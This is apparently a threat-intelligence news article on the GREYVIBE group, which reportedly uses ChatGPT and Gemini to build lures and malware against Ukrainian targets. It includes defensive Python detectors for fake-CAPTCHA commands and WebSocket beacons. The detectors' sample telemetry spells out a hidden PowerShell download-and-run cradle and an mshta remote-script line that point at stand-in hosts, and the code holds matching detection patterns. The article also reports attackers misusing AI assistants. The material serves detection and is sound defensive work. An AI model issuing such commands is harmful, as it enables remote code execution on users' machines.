GREYVIBE Hackers Leveraging AI Tools for Cyberattacks Targeting Ukraine, New Report Reveals

GREYVIBE Hackers Exploit AI Tools to Enhance Cyberattacks

The GREYVIBE hacking group has been actively leveraging advanced artificial intelligence (AI) tools, including ChatGPT and Google Gemini, to bolster their cyberattack capabilities. Since August 2025, this group has primarily targeted Ukrainian government, military, and civilian sectors, underscoring the increasing integration of AI in modern cyber warfare.

Researchers at WithSecure have identified GREYVIBE as a previously untracked threat actor exhibiting consistent patterns in infrastructure, tools, and operational behavior across multiple campaigns. While definitive attribution remains elusive, the group’s activities align closely with Russian state interests, particularly in intelligence gathering related to the Russia-Ukraine conflict. Evidence supporting this includes Russian-language artifacts, activity patterns corresponding to Moscow’s time zone, and a focus on Ukrainian institutions.

Exploitation of AI Tools

GREYVIBE employs a multifaceted attack strategy that combines spear-phishing emails, counterfeit CAPTCHA verification pages, and fraudulent websites to disseminate malware. In their spear-phishing campaigns, attackers impersonate Ukrainian government agencies, distributing malicious files via cloud services like Google Drive. These payloads execute decoy documents while covertly initiating infection chains using custom loaders.

A notable tactic involves fake CAPTCHA pages that instruct the victim to run a command themselves as a supposed verification step (the pattern commonly called ClickFix), so the initial execution is performed by the user rather than by an exploit, and the only trace on the endpoint is a user-launched process. Additionally, the group operates deceptive adult club websites aimed at Ukrainian individuals, particularly military personnel. These sites deliver malware such as FallSpy for Android and PhantomRelay for Windows and also support social engineering through fake personas on messaging platforms like Telegram.
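The fake CAPTCHA chain described above ends with a script interpreter launched by the user, which is where endpoint telemetry can catch it. The following is an added example, not code from the WithSecure report or from any GREYVIBE tooling: a scoring heuristic run over constructed Sysmon-style process-creation events. The field names follow Sysmon Event ID 1, but every sample event, hostname and weight is an assumption made for illustration.

```python
"""Heuristic detection for the "run this command to verify you are human"
infection chain, applied to constructed Sysmon-style process-creation events.

Assumptions (this example's own, not from the WithSecure report): field names
follow Sysmon Event ID 1 (Image, ParentImage, CommandLine, UtcTime); the sample
events and hostnames below are made up; the indicator list and weights are a
generic starting point for a hunting rule, not a signature for any named malware.
"""
from __future__ import annotations

import json
import re

# Interpreters a page can realistically tell a user to launch from the Win+R dialog.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# explorer.exe is the parent of anything typed into the Run dialog or the Start menu,
# which is how a user-pasted command shows up in process telemetry.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# (pattern, label, weight): each match on the command line adds its weight.
INDICATORS = [
    (re.compile(r"-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command", 3),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window", 2),
    (re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I), "download cradle", 2),
    (re.compile(r"\biex\b|invoke-expression", re.I), "invoke-expression", 2),
    (re.compile(r"https?://", re.I), "remote url", 1),
    # Lure pages often append a comment so the pasted line reads like a verification token.
    (re.compile(r"#.*(captcha|verif|human|robot)", re.I), "verification-themed comment", 3),
]
ALERT_THRESHOLD = 4


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Score one process-creation event; returns (score, reasons)."""
    reasons: list[str] = []
    image = basename(event.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return 0, reasons
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    score = 0
    if parent in RUN_DIALOG_PARENTS:
        score += 2
        reasons.append(f"{image} spawned by {parent}")
    # mshta given a URL fetches and runs remote script; no further indicators are needed.
    if image == "mshta.exe" and "://" in cmdline:
        score += 3
        reasons.append("mshta loading remote content")
    for pattern, label, weight in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(label)
    return score, reasons


def load_events(jsonl: str) -> list[dict]:
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def detect(events: list[dict]) -> list[dict]:
    """Return an alert record for every event scoring at or above ALERT_THRESHOLD."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({
                "utc_time": ev.get("UtcTime"),
                "image": basename(ev.get("Image", "")),
                "score": score,
                "reasons": reasons,
            })
    return alerts


# Constructed sample telemetry: one pasted lure command, one benign admin shell,
# one user opening PowerShell from Run, one mshta lure, one unrelated browser process.
SAMPLE_EVENTS_JSONL = r"""
{"UtcTime": "2025-09-02 08:14:03.117", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://example.invalid/verify.txt' -UseBasicParsing)\" # I am not a robot - reCAPTCHA Verification ID: 7812"}
{"UtcTime": "2025-09-02 08:20:45.002", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell.exe -NoProfile -Command \"Get-Service -Name Spooler\""}
{"UtcTime": "2025-09-02 09:01:12.450", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""}
{"UtcTime": "2025-09-02 09:33:58.910", "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta https://example.invalid/check.hta"}
{"UtcTime": "2025-09-02 09:40:00.000", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "chrome.exe --type=renderer"}
"""

if __name__ == "__main__":
    print(json.dumps(detect(load_events(SAMPLE_EVENTS_JSONL)), indent=2))
```

The weights are deliberately loose: a user opening PowerShell from the Run dialog scores 2 and stays quiet, while the pasted lure line trips several indicators at once. In production the same logic would read from the SIEM rather than an embedded string, and the allow-listing of known administrative scripts would be tuned per environment.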

A key finding in the report is GREYVIBE’s systematic use of generative AI across the attack lifecycle. Tools such as ChatGPT, Google Gemini, and Ideogram AI have been reportedly used to generate phishing lures, develop malware components, and support post-compromise activities. Researchers observed AI-generated code patterns in obfuscators and loaders such as DAYLIGHT and TEASOUP, as well as in the development of LegionRelay, a custom PowerShell-based remote access trojan. This AI-assisted approach appears to help the group compensate for limited technical sophistication while accelerating development cycles. It also reduces reliance on reused code, making traditional attribution methods more difficult. However, the group’s reliance on AI has introduced flaws. WithSecure identified design weaknesses in LegionRelay that exposed backend functionality, enabling researchers to monitor attacker activity over time.

Malware Toolkit

GREYVIBE’s malware arsenal includes PhantomRelay, a modular remote access trojan (RAT) that uses WebSockets for command execution. It gives attackers persistent access to compromised systems, remote command execution, and data exfiltration. A WebSocket is a long-lived, bidirectional channel established over an ordinary HTTP(S) connection, so the command-and-control server can push commands as soon as they are issued instead of waiting for the implant to poll, and the traffic blends in with the WebSocket sessions that legitimate web applications already open.
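Because WebSocket command channels look like ordinary web traffic at the request level, one place to hunt for them is the proxy log, looking for sessions that stay open far longer than a page would, or that re-establish on a fixed schedule. The following is an added example, not code or indicators from the report on GREYVIBE or PhantomRelay: the proxy record format, the allow-list, the thresholds and every sample record are assumptions constructed for illustration.

```python
"""Hunting for long-lived or regularly re-established WebSocket sessions to
unfamiliar hosts in web-proxy logs.

Assumptions (this example's own, not from the report): the proxy emits one JSON
record per completed connection with the fields used below; the allow-list,
thresholds and every sample record are constructed for illustration.
"""
from __future__ import annotations

import json
import statistics
from collections import defaultdict
from datetime import datetime

ALLOWLIST = {"teams.microsoft.com", "slack.com"}  # assumed known-good WebSocket endpoints
LONG_SESSION_S = 1800       # one socket held open this long is worth a look
MIN_RECONNECTS = 3          # sessions needed before judging the reconnect cadence
MAX_JITTER_RATIO = 0.2      # stdev(gap) / mean(gap) below this looks scheduled, not human


def load_records(jsonl: str) -> list[dict]:
    """Parse newline-delimited JSON proxy records, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def is_websocket(rec: dict) -> bool:
    """A completed WebSocket handshake: HTTP 101 with an Upgrade: websocket header."""
    return rec.get("status") == 101 and rec.get("upgrade", "").lower() == "websocket"


def group_sessions(records: list[dict]) -> dict[tuple[str, str], list[tuple[datetime, float]]]:
    """Map (client, host) to the time-sorted list of (start, duration_s) WebSocket sessions."""
    sessions: dict[tuple[str, str], list[tuple[datetime, float]]] = defaultdict(list)
    for rec in records:
        if not is_websocket(rec) or rec["host"] in ALLOWLIST:
            continue
        sessions[(rec["src"], rec["host"])].append(
            (datetime.fromisoformat(rec["ts"]), float(rec["duration_s"]))
        )
    for key in sessions:
        sessions[key].sort()
    return sessions


def analyze(records: list[dict]) -> list[dict]:
    """Return findings for long sessions and for low-jitter reconnect cadences."""
    findings = []
    for (src, host), sess in sorted(group_sessions(records).items()):
        longest = max(duration for _, duration in sess)
        if longest >= LONG_SESSION_S:
            findings.append({"src": src, "host": host, "kind": "long_session", "duration_s": longest})
        if len(sess) >= MIN_RECONNECTS:
            # Gaps between consecutive session starts; a beacon keeps these nearly constant.
            gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(sess, sess[1:])]
            mean_gap = statistics.mean(gaps)
            jitter = statistics.stdev(gaps) / mean_gap if mean_gap > 0 else float("inf")
            if jitter <= MAX_JITTER_RATIO:
                findings.append({"src": src, "host": host, "kind": "periodic_reconnect",
                                 "sessions": len(sess), "mean_gap_s": round(mean_gap, 1),
                                 "jitter_ratio": round(jitter, 3)})
    return findings


# Constructed sample log: four ~5-minute reconnects to one host, a plain GET to the same host,
# an allow-listed collaboration session, one very long session, and one short benign session.
SAMPLE_PROXY_JSONL = r"""
{"ts": "2025-09-02T09:00:00", "src": "10.20.30.41", "host": "cdn-update.example.invalid", "method": "GET", "path": "/ws", "status": 101, "upgrade": "websocket", "duration_s": 280}
{"ts": "2025-09-02T09:05:01", "src": "10.20.30.41", "host": "cdn-update.example.invalid", "method": "GET", "path": "/ws", "status": 101, "upgrade": "websocket", "duration_s": 281}
{"ts": "2025-09-02T09:10:00", "src": "10.20.30.41", "host": "cdn-update.example.invalid", "method": "GET", "path": "/ws", "status": 101, "upgrade": "websocket", "duration_s": 279}
{"ts": "2025-09-02T09:15:02", "src": "10.20.30.41", "host": "cdn-update.example.invalid", "method": "GET", "path": "/ws", "status": 101, "upgrade": "websocket", "duration_s": 280}
{"ts": "2025-09-02T09:02:10", "src": "10.20.30.41", "host": "cdn-update.example.invalid", "method": "GET", "path": "/static/app.js", "status": 200, "upgrade": "", "duration_s": 0.4}
{"ts": "2025-09-02T08:30:00", "src": "10.20.30.12", "host": "teams.microsoft.com", "method": "GET", "path": "/ws", "status": 101, "upgrade": "websocket", "duration_s": 5400}
{"ts": "2025-09-02T10:12:33", "src": "10.20.30.57", "host": "files.example.invalid", "method": "GET", "path": "/socket", "status": 101, "upgrade": "websocket", "duration_s": 4000}
{"ts": "2025-09-02T10:40:00", "src": "10.20.30.88", "host": "files.example.invalid", "method": "GET", "path": "/socket", "status": 101, "upgrade": "websocket", "duration_s": 12}
"""

if __name__ == "__main__":
    for finding in analyze(load_records(SAMPLE_PROXY_JSONL)):
        print(json.dumps(finding))
```

Two things the heuristic deliberately does not do: it does not inspect payloads (the WebSocket frames may be encrypted or simply opaque), and it ignores allow-listed hosts entirely, so a channel riding on a legitimate SaaS domain would need a different approach, such as comparing per-user session counts against the population.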

Another significant component is LegionRelay, a custom PowerShell-based RAT that gives attackers remote control over infected systems, including command execution, file manipulation and information gathering. Building LegionRelay with AI assistance let GREYVIBE create and deploy it quickly, but, as noted above, the same process left design weaknesses that exposed its backend and let researchers watch the operators at work.

The group’s use of FallSpy, an Android malware, indicates a broad targeting strategy that encompasses both desktop and mobile platforms. FallSpy is designed to infiltrate Android devices, collect sensitive information, and transmit it back to the attackers. The deployment of such malware through deceptive websites and social engineering tactics highlights the multifaceted approach GREYVIBE employs to compromise targets.

Implications and Challenges

The integration of AI tools into attack tooling presents real challenges for defenders. AI-generated phishing lures can be more convincing, and freshly generated malware components lack the reused code that signature-based detection depends on. The rapid development cycles AI enables also let threat actors adapt quickly once a component is detected, so defenses that rely on static signatures alone lose effectiveness.

The use of AI also complicates attribution efforts. AI-generated code can lack the distinct signatures typically used to identify and track threat actors, making it more difficult for researchers to link attacks to specific groups. This anonymity can embolden attackers, knowing that their activities are less likely to be traced back to them.

The reliance on AI is not without drawbacks for attackers, however. The design flaws in LegionRelay show that AI-assisted development can introduce weaknesses that defenders can turn to their advantage, in that case to observe the operators’ own activity. Identifying and understanding such weaknesses lets defenders build detection and mitigation strategies for AI-assisted attacks.

Recommendations for Defense

To counter the evolving threat landscape shaped by AI-assisted cyberattacks, organizations should consider the following measures:

1. Enhanced Phishing Awareness Training: Educate employees about AI-generated phishing, the importance of scrutinizing unexpected communications, and the fake CAPTCHA pattern specifically: no legitimate verification step ever asks a user to paste a command into a terminal or the Run dialog.

2. Advanced Threat Detection Systems: Because AI-generated code lacks reusable signatures, favor behavioral detection over static matching: process lineage and command-line logging on endpoints (for example, a script interpreter launched from the Run dialog with a download cradle), PowerShell script block logging, and egress analytics that surface long-lived or periodic connections to unfamiliar hosts.

3. Regular Security Audits: Conduct frequent assessments of security infrastructure to identify and address potential vulnerabilities that could be exploited by AI-assisted attacks.

4. Incident Response Planning: Develop and regularly update incident response plans to ensure swift and effective action in the event of a security breach.

5. Collaboration and Information Sharing: Engage with industry peers and cybersecurity organizations to share intelligence on emerging threats and effective defense strategies.

By adopting these measures, organizations can enhance their resilience against the sophisticated and rapidly evolving threats posed by groups like GREYVIBE.